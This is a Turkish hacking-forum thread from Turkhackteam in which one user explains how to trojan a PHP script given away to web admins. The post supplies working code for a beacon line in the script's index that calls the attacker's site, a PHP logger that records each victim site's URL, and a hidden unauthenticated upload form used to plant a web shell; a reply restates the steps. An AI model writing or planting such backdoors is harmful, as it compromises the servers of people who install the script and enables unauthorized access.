Hacking'de Senaryolar [Website Backdoor]

SeLeXuS

SeLeXuS

Yeni üye
17 Ocak 2019
34
0
Linux
Hostiglere SIZIN [Website Backdoor]

Merhaba Arkadaşlar Ben SeLeXuS
Hacking'de senaryoların önemi çok büyük bu yüzden sizlere bugün bir Senaryo anlatıcağım
Neden Bu kadar Önemli ?
Düşünün bir website yazdınız veya elinizde bir script var bunula bir web site hacklemek istemezmisiniz "Nasılmı ?" diye sorduğunuzu duyar gibiyim.
İlk Önce aklımızdan bir senaryo uyduralım.
yabancı bir forum bulalım ve bu forum website kurmayı bilen bir kitle olsun
ve ellerine bir script verin ne olduğu fark etmez ama ilgi çekici ve kullanmak istiyecekleri bir script olması kitleyi artırır
sonra bu kodu sayfanın indexinde kodların arasına yerleştirin
Kod: 
<?php 
echo '<link rel="stylesheet" type="text/css" href="http://siteniz.com/codervb.php">'; 
?>
sonra kendi websitenize bu kodu yerleştirin
Kod: 
<?php
$verimiz = $_SERVER["HTTP_REFERER"];
$dosya = "loglar.txt"; 
$dosyam = fopen ($dosya , 'a+') or die ("Dosya a癟覺lamad覺!"); 
$yazi = "$verimiz\n"; 
fwrite($dosyam,$yazi); 
fclose($dosyam); 
?>
bunlar ne işemi yarıyacak hemen anlatıyorum bu kodlar website Url'sini log alıp sizin web sitenizdeki "log.txt" dosyasına kayıt altına alıcak
Url ne işe yarıyacak ?
Bu Fazla Birşey Değil şimdi bu kodu ise websitenin en ücra dosyaları arasına herhangi bir isimle kaydedin
Kod: 
<form action="" method="post" enctype="multipart/form-data">
   <input type="file" name="dosya" />
   <input type="submit" value="Gönder" />
</form>
<?
if($_FILES){
            $dosya = $_FILES['dosya']['tmp_name'];
            copy($dosya, $_FILES['dosya']['name']);
            echo 'Tamamdır';
         
    }
?>
bu kod ise size Backdoor yani arka kapı sağlıyacaktır bu kod ile websiteye upload yapabilirsiniz
Shelli yükledikten sonra gerisi sizde zaten.​
 
Son düzenleme:
SeLeXuS

SeLeXuS

Yeni üye
17 Ocak 2019
34
0
Linux
HackerBeys' Alıntı:
Biraz da açık anlatabilir misin? Tam anlamadım.
Genişletmek için tıkla ...

bir script seç ve o scriptin index sayfasına 1. kodu ekle siteniz yazan yere kendi siteni ekle
sonra 2. kodu kendi veb sitene codervb.php adı ile kaydet 3. kou ise scriptin içine istediğin ad ile kaydet sakla sonra senin websitede log.txt dosyası oluşacak onun içindeki websiteleri al ve sakladığın 3. kodu çalıştır ve shell upload et
 
ByZehirx

ByZehirx

Yaşayan Forum Efsanesi
10 Şub 2012
12,386
2,001
Dinlenmede.
Cok Eski Bir Mantık.
Artik hemen hemen her Script forumlarinda bu olaylar nedeni ile bilgi paylasimi ve önemli detaylar anlatilmaktadir ki ( önemli )bir web sitesi kurmak istiyen her harikada script yada tema forumlarina üyelik acıyor oradaki mantiklari anlamak adina bilgi amacli vakit geciriyor neticesinde bu tarz eylemleri orada goruyor ve scriptleri kötü kodlar varmi yok mu taratmasi gerektigini anliyor buda şuanki mevcut yolu tıkıyor.

Ama elbette bazı insanlar (amatör) bu konulari anlamiyor yada önemsemiyor o yüzden işe yarar bir konu oluyor mantık.
Pek ciddi buldugum bir konu degil aslinda suanki makale fakat yinede eline saglik anlatmisin.
İyi forumlar dostlar
 
Cevap yazmak için giriş yap yada kayıt ol.
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.